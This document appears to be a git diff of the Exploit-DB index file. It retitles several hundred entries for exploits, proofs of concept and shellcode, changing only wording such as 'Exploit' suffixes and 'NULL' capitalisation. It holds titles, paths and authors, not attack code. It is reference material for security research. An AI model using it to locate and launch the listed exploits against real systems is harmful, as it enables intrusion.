+32312,14 @@ id,file,description,date,author,platform,type,port 35842,platforms/windows/dos/35842.c,"Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service",2015-01-20,"Parvez Anwar",windows,dos,0 35993,platforms/windows/local/35993.c,"AVG Internet Security 2015.0.5315 - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 35994,platforms/windows/local/35994.c,"BullGuard Multiple Products - Arbitrary Write Privilege Escalation",2015-02-04,"Parvez Anwar",windows,local,0 -35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change Exploit",2015-02-05,"Todor Donev",hardware,remote,0 +35995,platforms/hardware/remote/35995.sh,"Shuttle Tech ADSL Modem-Router 915 WM - Unauthenticated Remote DNS Change",2015-02-05,"Todor Donev",hardware,remote,0 35996,platforms/php/webapps/35996.txt,"Magento Server MAGMI Plugin - Multiple Vulnerabilities",2015-02-05,SECUPENT,php,webapps,0 35997,platforms/hardware/remote/35997.sh,"Sagem F@st 3304 Routers - PPPoE Credentials Information Disclosure",2011-07-27,securititracker,hardware,remote,0 35845,platforms/java/remote/35845.rb,"ManageEngine Multiple Products - Authenticated File Upload",2015-01-20,Metasploit,java,remote,8080 35846,platforms/php/webapps/35846.txt,"WordPress Pixarbay Images Plugin 2.3 - Multiple Vulnerabilities",2015-01-20,"Hans-Martin Muench",php,webapps,80 -35847,platforms/osx/local/35847.c,"Apple Mac OS X networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 -35848,platforms/osx/local/35848.c,"Apple Mac OS X 10.9.5 - IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 -35849,platforms/osx/dos/35849.c,"Apple Mac OS X 10.10 - IOKit IntelAccelerator NULL Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0 +35847,platforms/osx/local/35847.c,"Apple Mac OSX networkd - 'effective_audit_token' XPC Type Confusion Sandbox Escape",2015-01-20,"Google Security Research",osx,local,0 +35848,platforms/osx/local/35848.c,"Apple Mac OSX 10.9.5 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,local,0 +35849,platforms/osx/dos/35849.c,"Apple Mac OSX 10.10 - IOKit IntelAccelerator Null Pointer Dereference",2015-01-20,"Google Security Research",osx,dos,0 35850,platforms/windows/local/35850.bat,"Microsoft Windows XP - 'tskill' Privilege Escalation",2011-06-13,"Todor Donev",windows,local,0 35851,platforms/php/webapps/35851.txt,"WebFileExplorer 3.6 - 'user' and 'pass' SQL Injection",2011-06-13,pentesters.ir,php,webapps,0 35852,platforms/asp/webapps/35852.txt,"Microsoft Lync Server 2010 - 'ReachJoin.aspx' Remote Command Injection",2011-06-13,"Mark Lachniet",asp,webapps,0 @@ -32334,10 +32340,10 @@ id,file,description,date,author,platform,type,port 35867,platforms/php/webapps/35867.txt,"Taha Portal 3.2 - 'sitemap.php' Cross-Site Scripting",2011-06-18,Bl4ck.Viper,php,webapps,0 35868,platforms/linux_mips/shellcode/35868.c,"Linux/MIPS - execve /bin/sh Shellcode (36 bytes)",2015-01-22,Sanguine,linux_mips,shellcode,0 35869,platforms/windows/dos/35869.txt,"Crystal Player 1.99 - Memory Corruption",2015-01-21,"Kapil Soni",windows,dos,0 -35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - SEH Based Buffer Overflow",2015-01-22,"Osanda Malith",windows,dos,0 +35870,platforms/windows/dos/35870.rb,"Exif Pilot 4.7.2 - Buffer Overflow (SEH)",2015-01-22,"Osanda Malith",windows,dos,0 35871,platforms/php/webapps/35871.txt,"Sitemagic CMS 2010.04.17 - 'SMExt' Parameter Cross-Site Scripting",2011-06-21,"Gjoko Krstic",php,webapps,0 35872,platforms/asp/webapps/35872.txt,"H3C ER5100 - Authentication Bypass",2011-06-22,128bit,asp,webapps,0 -35873,platforms/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' NULL Pointer Dereference Denial Of Service",2011-06-17,rouli,windows,dos,0 +35873,platforms/windows/dos/35873.txt,"Wireshark 1.4.5 - 'bytes_repr_len()' Null Pointer Dereference Denial Of Service",2011-06-17,rouli,windows,dos,0 35874,platforms/php/webapps/35874.txt,"Eshop Manager - Multiple SQL Injections",2011-06-22,"Number 7",php,webapps,0 35875,platforms/php/webapps/35875.txt,"FanUpdate 3.0 - 'pageTitle' Parameter Cross-Site Scripting",2011-06-22,"High-Tech Bridge SA",php,webapps,0 35876,platforms/windows/dos/35876.html,"Easewe FTP OCX ActiveX Control 4.5.0.9 - 'EaseWeFtp.ocx' Multiple Insecure Method Vulnerabilities",2011-06-22,"High-Tech Bridge SA",windows,dos,0 @@ -32359,7 +32365,7 @@ id,file,description,date,author,platform,type,port 35892,platforms/multiple/remote/35892.txt,"MySQLDriverCS 4.0.1 - SQL Injection",2011-06-27,"Qihan Luo",multiple,remote,0 35893,platforms/php/webapps/35893.txt,"WordPress Pretty Link Lite Plugin 1.4.56 - Multiple SQL Injections",2011-06-27,MaKyOtOx,php,webapps,0 35894,platforms/php/webapps/35894.txt,"Joomla! CMS 1.6.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"Aung Khant",php,webapps,0 -35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - NULL Pointer Dereference Denial Of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 +35895,platforms/windows/dos/35895.txt,"RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial Of Service",2011-06-28,"Luigi Auriemma",windows,dos,0 35896,platforms/php/webapps/35896.txt,"Flatpress 0.1010.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-06-28,"High-Tech Bridge SA",php,webapps,0 35897,platforms/windows/remote/35897.html,"CygniCon CyViewer - ActiveX Control 'SaveData()' Insecure Method",2011-06-28,"High-Tech Bridge SA",windows,remote,0 35898,platforms/multiple/remote/35898.php,"Atlassian JIRA 3.13.5 - File Download Security Bypass",2011-06-28,"Ignacio Garrido",multiple,remote,0 @@ -32369,7 +32375,7 @@ id,file,description,date,author,platform,type,port 35902,platforms/windows/local/35902.txt,"VLC Player 2.1.5 - Write Access Violation",2015-01-26,"Veysel HATAS",windows,local,0 35980,platforms/multiple/webapps/35980.html,"ManageEngine Desktop Central 9 Build 90087 - Cross-Site Request Forgery",2015-02-03,"Mohamed Idris",multiple,webapps,8020 35904,platforms/jsp/webapps/35904.txt,"ManageEngine ServiceDesk Plus 9.0 (< Build 9031) - User Privileges Management",2015-01-26,"Rewterz - Research Group",jsp,webapps,0 -35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - NULL Pointer Dereference EOP",2015-01-26,"Parvez Anwar",windows,local,0 +35905,platforms/windows/local/35905.c,"Comodo Backup 4.4.0.0 - Null Pointer Dereference EOP",2015-01-26,"Parvez Anwar",windows,local,0 35906,platforms/php/webapps/35906.txt,"PHP Webquest 2.6 - SQL Injection",2015-01-26,"jordan root",php,webapps,0 35908,platforms/multiple/webapps/35908.txt,"SWFupload 2.5.0 - Cross Frame Scripting (XFS)",2015-01-26,MindCracker,multiple,webapps,0 35913,platforms/android/dos/35913.txt,"Android WiFi-Direct - Denial of Service",2015-01-26,"Core Security",android,dos,0 @@ -32384,15 +32390,15 @@ id,file,description,date,author,platform,type,port 35991,platforms/php/webapps/35991.txt,"Pragyan CMS 3.0 - SQL Injection",2015-02-04,"Steffen Rösemann",php,webapps,80 35914,platforms/php/webapps/35914.txt,"ferretCMS 1.0.4-alpha - Multiple Vulnerabilities",2015-01-26,"Steffen Rösemann",php,webapps,80 35915,platforms/multiple/webapps/35915.txt,"Symantec Data Center Security - Multiple Vulnerabilities",2015-01-26,"SEC Consult",multiple,webapps,0 -35916,platforms/php/webapps/35916.txt,"WordPress Photo Gallery Plugin 1.2.5 - Unrestricted File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 -35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change Exploit",2015-01-27,"Todor Donev",hardware,remote,0 +35916,platforms/php/webapps/35916.txt,"WordPress Photo Gallery Plugin 1.2.5 - Unrestricted Arbitrary File Upload",2014-11-11,"Kacper Szurek",php,webapps,80 +35917,platforms/hardware/remote/35917.txt,"D-Link DSL-2740R - Unauthenticated Remote DNS Change",2015-01-27,"Todor Donev",hardware,remote,0 35918,platforms/multiple/remote/35918.c,"IBM DB2 - 'DT_RPATH' Insecure Library Loading Arbitrary Code Execution",2011-06-30,"Tim Brown",multiple,remote,0 35919,platforms/bsd/remote/35919.c,"NetBSD 5.1 - Multiple 'libc/net' functions Stack Buffer Overflow",2011-07-01,"Maksymilian Arciemowicz",bsd,remote,0 35920,platforms/php/webapps/35920.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities (2)",2011-07-04,"Stefan Schurtz",php,webapps,0 35921,platforms/windows/remote/35921.html,"iMesh 10.0 - 'IMWebControl.dll' ActiveX Control Buffer Overflow",2011-07-04,KedAns-Dz,windows,remote,0 35922,platforms/php/webapps/35922.txt,"Joomla! 'com_jr_tfb' Component - 'Controller' Parameter Local File Inclusion",2011-07-05,FL0RiX,php,webapps,0 35923,platforms/asp/webapps/35923.txt,"Paliz Portal - Cross-Site Scripting / Multiple SQL Injection",2011-07-02,Net.Edit0r,asp,webapps,0 -35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass Exploit",2015-01-28,"Jeremy Brown",windows,remote,0 +35924,platforms/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",2015-01-28,"Jeremy Brown",windows,remote,0 35925,platforms/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Security Vulnerabilities",2011-07-05,"Zsolt Imre",hardware,remote,0 35926,platforms/asp/webapps/35926.txt,"eTAWASOL - 'id' Parameter SQL Injection",2011-07-03,Bl4ck.Viper,asp,webapps,0 35927,platforms/php/webapps/35927.txt,"Classified Script - c-BrowseClassified URL Cross-Site Scripting",2011-07-05,"Raghavendra Karthik D",php,webapps,0 @@ -32402,7 +32408,7 @@ id,file,description,date,author,platform,type,port 35931,platforms/php/webapps/35931.txt,"ICMusic 1.2 - 'music_id' Parameter SQL Injection",2011-07-11,kaMtiEz,php,webapps,0 35932,platforms/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Exploit",2015-01-29,"Nicholas Lemonias",hardware,remote,0 35933,platforms/hardware/webapps/35933.txt,"ManageEngine Firewall Analyzer 8.0 - Directory Traversal / Cross-Site Scripting",2015-01-29,"Sepahan TelCom IT Group",hardware,webapps,0 -35934,platforms/osx/local/35934.txt,"Apple Mac OS X < 10.10.x - GateKeeper Bypass",2015-01-29,"Amplia Security Research",osx,local,0 +35934,platforms/osx/local/35934.txt,"Apple Mac OSX < 10.10.x - GateKeeper Bypass",2015-01-29,"Amplia Security Research",osx,local,0 35935,platforms/windows/local/35935.py,"UniPDF 1.1 - Crash PoC (SEH overwritten)",2015-01-29,bonze,windows,local,0 35936,platforms/windows/local/35936.py,"Microsoft Windows Server 2003 SP2 - Privilege Escalation",2015-01-29,KoreLogic,windows,local,0 35938,platforms/freebsd/dos/35938.txt,"FreeBSD Kernel - Multiple Vulnerabilities",2015-01-29,"Core Security",freebsd,dos,0 @@ -32461,7 +32467,7 @@ id,file,description,date,author,platform,type,port 36011,platforms/asp/webapps/36011.txt,"Ataccan E-Ticaret Scripti - 'id' Parameter SQL Injection",2011-08-03,Err0R,asp,webapps,0 36012,platforms/php/webapps/36012.txt,"Joomla! Slideshow Gallery Component - 'id' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36013,platforms/multiple/remote/36013.txt,"foomatic-gui python-foomatic 0.7.9.4 - 'pysmb.py' Arbitrary Shell Command Execution",2011-08-03,daveb,multiple,remote,0 -36014,platforms/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure Exploit",2015-02-07,"Todor Donev",hardware,remote,0 +36014,platforms/hardware/remote/36014.pl,"LG DVR LE6016D - Unauthenticated Remote Users/Passwords Disclosure",2015-02-07,"Todor Donev",hardware,remote,0 36015,platforms/php/webapps/36015.txt,"Joomla! 'com_community' Component - 'userid' Parameter SQL Injection",2011-08-03,"Ne0 H4ck3R",php,webapps,0 36016,platforms/multiple/remote/36016.txt,"Xpdf 3.02-13 - 'zxpdf' Security Bypass",2011-08-04,"Chung-chieh Shan",multiple,remote,0 36017,platforms/php/webapps/36017.txt,"HESK 2.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-03,"High-Tech Bridge SA",php,webapps,0 @@ -32469,7 +32475,7 @@ id,file,description,date,author,platform,type,port 36019,platforms/asp/webapps/36019.txt,"Community Server 2007/2008 - 'TagSelector.aspx' Cross-Site Scripting",2011-08-04,PontoSec,asp,webapps,0 36020,platforms/windows/remote/36020.txt,"Microsoft Visual Studio Report Viewer 2005 Control - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Adam Bixby",windows,remote,0 36041,platforms/php/webapps/36041.txt,"Fork CMS 3.8.5 - SQL Injection",2015-02-09,"Sven Schleier",php,webapps,80 -36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow (PoC)",2015-02-09,"Samandeep Singh",windows,dos,0 +36022,platforms/windows/dos/36022.py,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (PoC)",2015-02-09,"Samandeep Singh",windows,dos,0 36023,platforms/php/webapps/36023.txt,"RedaxScript CMS 2.2.0 - SQL Injection",2015-02-09,"ITAS Team",php,webapps,0 36024,platforms/linux/dos/36024.txt,"Chemtool 1.6.14 - Memory Corruption",2015-02-08,"Pablo González",linux,dos,0 36059,platforms/php/webapps/36059.txt,"Exponent CMS 2.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2015-02-12,"Mayuresh Dani",php,webapps,80 @@ -32484,11 +32490,11 @@ id,file,description,date,author,platform,type,port 36034,platforms/php/webapps/36034.txt,"OpenEMR 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-09,"Houssam Sahli",php,webapps,0 36035,platforms/php/webapps/36035.txt,"BlueSoft Banner Exchange - 'referer_id' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 36036,platforms/php/webapps/36036.txt,"BlueSoft Rate My Photo Site - 'ty' Parameter SQL Injection",2011-08-08,darkTR,php,webapps,0 -36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server 4.0.2 - NULL Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 +36037,platforms/multiple/dos/36037.txt,"Adobe Flash Media Server 4.0.2 - Null Pointer Dereference Remote Denial of Service",2011-08-09,"Knud Erik Hojgaard",multiple,dos,0 36038,platforms/php/webapps/36038.txt,"WordPress eShop Plugin 6.2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-10,"High-Tech Bridge SA",php,webapps,0 39386,platforms/php/webapps/39386.txt,"iScripts EasyCreate 3.0 - Multiple Vulnerabilities",2016-02-01,"Bikramaditya Guha",php,webapps,80 36042,platforms/hardware/webapps/36042.txt,"LG DVR LE6016D - Remote File Disclosure",2015-02-10,"Yakir Wizman",hardware,webapps,0 -36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart Plugin - Unrestricted File Upload",2015-02-10,Metasploit,php,webapps,80 +36043,platforms/php/webapps/36043.rb,"WordPress WP EasyCart Plugin - Unrestricted Arbitrary File Upload",2015-02-10,Metasploit,php,webapps,80 36044,platforms/php/webapps/36044.txt,"PHP Flat File Guestbook 1.0 - 'ffgb_admin.php' Remote File Inclusion",2011-08-11,"RiRes Walid",php,webapps,0 36045,platforms/cgi/remote/36045.txt,"SurgeFTP 23b6 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-16,"Houssam Sahli",cgi,remote,0 36046,platforms/php/webapps/36046.txt,"phpWebSite - 'page_id' Parameter Cross-Site Scripting",2011-08-17,Ehsan_Hp200,php,webapps,0 @@ -32498,12 +32504,12 @@ id,file,description,date,author,platform,type,port 36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 Plugin - 'index.php' Cross-Site Scripting",2011-08-17,"High-Tech Bridge SA",php,webapps,0 36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0 36052,platforms/windows/local/36052.c,"SoftSphere DefenseWall FW/IPS 3.24 - Privilege Escalation",2015-02-11,"Parvez Anwar",windows,local,0 -36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow Exploit (1)",2015-02-11,"dogo h@ck",windows,local,0 +36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 - 'm3u' Buffer Overflow (SEH) (1)",2015-02-11,"dogo h@ck",windows,local,0 36054,platforms/php/webapps/36054.txt,"WordPress Survey and Poll Plugin 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80 36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection",2015-02-11,Vulnerability-Lab,php,webapps,8080 36056,platforms/windows/remote/36056.rb,"Achat 0.150 beta7 - Buffer Overflow (Metasploit)",2015-02-11,Metasploit,windows,remote,9256 36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Persistent Cross-Site Scripting",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311 -36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 - Multiple NULL Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 +36070,platforms/php/dos/36070.txt,"PHP Prior to 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities",2011-08-19,"Maksymilian Arciemowicz",php,dos,0 36061,platforms/php/webapps/36061.php,"WordPress Webdorado Spider Event Calendar 1.4.9 Plugin - SQL Injection",2015-02-13,"Mateusz Lach",php,webapps,0 36062,platforms/windows/local/36062.txt,"Realtek 11n Wireless LAN utility - Privilege Escalation",2015-02-13,"Humberto Cabrera",windows,local,0 36063,platforms/asp/webapps/36063.txt,"Code Widgets Online Job Application - 'admin.asp' Multiple SQL Injection",2011-08-17,"L0rd CrusAd3r",asp,webapps,0 @@ -32544,8 +32550,8 @@ id,file,description,date,author,platform,type,port 36101,platforms/java/remote/36101.rb,"Java JMX - Server Insecure Configuration Java Code Execution",2015-02-17,Metasploit,java,remote,1617 36102,platforms/php/webapps/36102.txt,"Mambo CMS N-Gallery Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36103,platforms/php/webapps/36103.txt,"Mambo CMS AHS Shop Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 -36104,platforms/windows/local/36104.py,"Publish-It 3.6d - Buffer Overflow (SEH) Exploit",2015-02-18,"Andrew Smith",windows,local,0 -36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change Exploit",2015-02-18,"Todor Donev",hardware,webapps,0 +36104,platforms/windows/local/36104.py,"Publish-It 3.6d - Buffer Overflow (SEH)",2015-02-18,"Andrew Smith",windows,local,0 +36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",hardware,webapps,0 36106,platforms/php/webapps/36106.txt,"Mambo CMS N-Press Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,php,webapps,0 36108,platforms/php/webapps/36108.txt,"Mambo CMS N-Frettir Component - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 @@ -32580,7 +32586,7 @@ id,file,description,date,author,platform,type,port 36140,platforms/php/webapps/36140.txt,"Toko LiteCMS 1.5.2 - HTTP Response Splitting / Cross-Site Scripting",2011-09-19,"Gjoko Krstic",php,webapps,0 36141,platforms/asp/webapps/36141.txt,"Aspgwy Access 1.0 - 'matchword' Parameter Cross-Site Scripting",2011-09-19,"kurdish hackers team",asp,webapps,0 36142,platforms/php/webapps/36142.txt,"net4visions Multiple Products - 'dir' Parameters Multiple Cross-Site Scripting Vulnerabilities",2011-09-19,"Gjoko Krstic",php,webapps,0 -36143,platforms/osx/local/36143.txt,"Apple Mac OS X (Lion) - Directory Services Security Bypass",2011-09-19,"Defence in Depth",osx,local,0 +36143,platforms/osx/local/36143.txt,"Apple Mac OSX (Lion) - Directory Services Security Bypass",2011-09-19,"Defence in Depth",osx,local,0 36144,platforms/php/webapps/36144.txt,"Card sharj 1.0 - Multiple SQL Injections",2011-09-19,Net.Edit0r,php,webapps,0 36145,platforms/windows/remote/36145.py,"IBM Lotus Domino 8.5.2 - 'NSFComputeEvaluateExt()' Function Remote Stack Buffer Overflow",2011-09-20,rmallof,windows,remote,0 36146,platforms/asp/webapps/36146.txt,"i-Gallery 3.4 - 'd' Parameter Cross-Site Scripting",2011-09-21,Kurd-Team,asp,webapps,0 @@ -32592,7 +32598,7 @@ id,file,description,date,author,platform,type,port 36152,platforms/windows/dos/36152.html,"Samsung iPOLiS 1.12.2 - iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue (PoC)",2015-02-22,"Praveen Darshanam",windows,dos,0 36169,platforms/multiple/remote/36169.rb,"HP Client - Automation Command Injection",2015-02-24,Metasploit,multiple,remote,3465 36154,platforms/php/webapps/36154.txt,"Beehive Forum 1.4.4 - Persistent Cross-Site Scripting",2015-02-23,"Halil Dalabasmaz",php,webapps,0 -36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 - Unrestricted File Upload Exploit",2015-02-23,"CWH Underground",php,webapps,80 +36155,platforms/php/webapps/36155.php,"WeBid 1.1.1 - Unrestricted Arbitrary File Upload",2015-02-23,"CWH Underground",php,webapps,80 36156,platforms/php/webapps/36156.txt,"Clipbucket 2.7 RC3 0.9 - Blind SQL Injection",2015-02-23,"CWH Underground",php,webapps,80 36157,platforms/php/webapps/36157.rb,"Zabbix 2.0.5 - Cleartext ldap_bind_Password Password Disclosure (Metasploit)",2015-02-23,"Pablo González",php,webapps,80 36158,platforms/php/dos/36158.txt,"PHP DateTime - Use-After-Free",2015-02-23,"Taoguang Chen",php,dos,0 @@ -32684,7 +32690,7 @@ id,file,description,date,author,platform,type,port 36243,platforms/php/webapps/36243.txt,"WordPress cp-multi-view-calendar 1.1.4 Plugin - SQL Injection",2015-03-03,"i0akiN SEC-LABORATORY",php,webapps,0 36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 - 'segment' Parameter Cross-Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 36247,platforms/multiple/dos/36247.txt,"Splunk 4.1.6 Web Component - Remote Denial of Service",2011-10-20,"Filip Palian",multiple,dos,0 -36248,platforms/php/webapps/36248.txt,"osCommerce - Remote File Upload / File Disclosure",2011-10-20,indoushka,php,webapps,0 +36248,platforms/php/webapps/36248.txt,"osCommerce - Arbitrary File Upload / File Disclosure",2011-10-20,indoushka,php,webapps,0 36249,platforms/php/webapps/36249.txt,"Tine 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-20,"High-Tech Bridge SA",php,webapps,0 36250,platforms/windows/remote/36250.html,"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,windows,remote,0 36251,platforms/php/webapps/36251.txt,"PHPMoAdmin - Unauthorized Remote Code Execution",2015-03-03,@u0x,php,webapps,80 @@ -32704,7 +32710,7 @@ id,file,description,date,author,platform,type,port 36268,platforms/linux/dos/36268.c,"Linux Kernel 3.16.3 - Associative Array Garbage Collection Crash (PoC)",2015-03-04,"Emeric Nasi",linux,dos,0 36269,platforms/php/webapps/36269.txt,"SjXjV 2.3 - 'post.php' SQL Injection",2011-10-28,"599eme Man",php,webapps,0 36270,platforms/php/webapps/36270.txt,"Plici Search 2.0.0.Stable.r.1878 - 'p48-search.html' Cross-Site Scripting",2011-10-28,"599eme Man",php,webapps,0 -36271,platforms/osx/dos/36271.py,"Apple Mac OS X 10.6.5 / iOS 4.3.3 Mail - Denial of Service",2011-10-29,shebang42,osx,dos,0 +36271,platforms/osx/dos/36271.py,"Apple Mac OSX 10.6.5 / iOS 4.3.3 Mail - Denial of Service",2011-10-29,shebang42,osx,dos,0 36272,platforms/php/webapps/36272.txt,"Domain Shop - 'index.php' Cross-Site Scripting",2011-11-01,Mr.PaPaRoSSe,php,webapps,0 36273,platforms/php/webapps/36273.txt,"vBulletin 4.1.7 - Multiple Remote File Inclusion",2011-11-01,indoushka,php,webapps,0 36274,platforms/linux_mips/shellcode/36274.c,"Linux/MIPS - (Little Endian) Chmod 666 /etc/shadow Shellcode (55 bytes)",2015-03-05,"Sang Min Lee",linux_mips,shellcode,0 @@ -32801,15 +32807,15 @@ id,file,description,date,author,platform,type,port 36367,platforms/php/webapps/36367.txt,"Manx 1.0.1 - /admin/admin_pages.php Filename Parameter Traversal Arbitrary File Access",2011-11-28,LiquidWorm,php,webapps,0 36368,platforms/php/webapps/36368.txt,"WoltLab Community Gallery - Persistent Cross-Site Scripting",2015-03-13,"ITAS Team",php,webapps,0 36369,platforms/xml/webapps/36369.txt,"Citrix Netscaler NS10.5 - WAF Bypass (Via HTTP Header Pollution)",2015-03-12,"BGA Security",xml,webapps,0 -36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload (Code Execution)",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0 +36370,platforms/linux/remote/36370.txt,"ArcSight Logger - Arbitrary File Upload / Code Execution",2015-03-13,"Horoszkiewicz Julian ISP_",linux,remote,0 36371,platforms/php/webapps/36371.txt,"Codiad 2.5.3 - Local File Inclusion",2015-03-12,"TUNISIAN CYBER",php,webapps,0 36372,platforms/php/webapps/36372.txt,"WordPress Theme DesignFolio Plus 1.2 - Arbitrary File Upload",2015-03-04,CrashBandicot,php,webapps,0 36373,platforms/php/webapps/36373.txt,"Joomla Simple Photo Gallery 1.0 - Arbitrary File Upload",2015-03-10,CrashBandicot,php,webapps,0 36374,platforms/php/webapps/36374.txt,"WordPress Plugin Reflex Gallery 3.1.3 - Arbitrary File Upload",2015-03-08,CrashBandicot,php,webapps,0 36375,platforms/asp/webapps/36375.txt,"Virtual Vertex Muster 6.1.6 - Web Interface Directory Traversal",2011-11-29,"Nick Freeman",asp,webapps,0 36376,platforms/windows/remote/36376.txt,"Oxide WebServer - Directory Traversal",2011-11-29,demonalex,windows,remote,0 -36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Request NULL Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 -36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 - NULL Pointer Invalid HTTP Request Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 +36377,platforms/multiple/dos/36377.txt,"CoDeSys 3.4 - HTTP POST Request Null Pointer Content-Length Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 +36378,platforms/multiple/dos/36378.txt,"CoDeSys 3.4 - Null Pointer Invalid HTTP Request Parsing Remote Denial of Service",2011-11-30,"Luigi Auriemma",multiple,dos,0 36379,platforms/php/webapps/36379.txt,"OrangeHRM 2.6.11 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36380,platforms/php/webapps/36380.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php URI Cross-Site Scripting",2011-11-30,"High-Tech Bridge SA",php,webapps,0 36381,platforms/php/webapps/36381.txt,"OrangeHRM 2.6.11 - lib/controllers/CentralController.php id Parameter SQL Injection",2011-11-30,"High-Tech Bridge SA",php,webapps,0 @@ -32920,7 +32926,7 @@ id,file,description,date,author,platform,type,port 36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0 36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0 36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps,0 -36497,platforms/php/webapps/36497.txt,"UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting",2012-01-04,sonyy,php,webapps,0 +36497,platforms/php/webapps/36497.txt,"UBB.Threads 7.5.6 - ''Username'' Field Cross-Site Scripting",2012-01-04,sonyy,php,webapps,0 36498,platforms/php/webapps/36498.txt,"Yaws 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 36499,platforms/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 - Directory Traversal",2012-01-05,demonalex,windows,remote,0 @@ -32942,7 +32948,7 @@ id,file,description,date,author,platform,type,port 36517,platforms/windows/remote/36517.html,"WebGate WinRDS 2.0.8 - StopSiteAllChannel Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 36518,platforms/windows/remote/36518.html,"WebGate Control Center 4.8.7 - GetThumbnail Stack Overflow",2015-03-27,"Praveen Darshanam",windows,remote,0 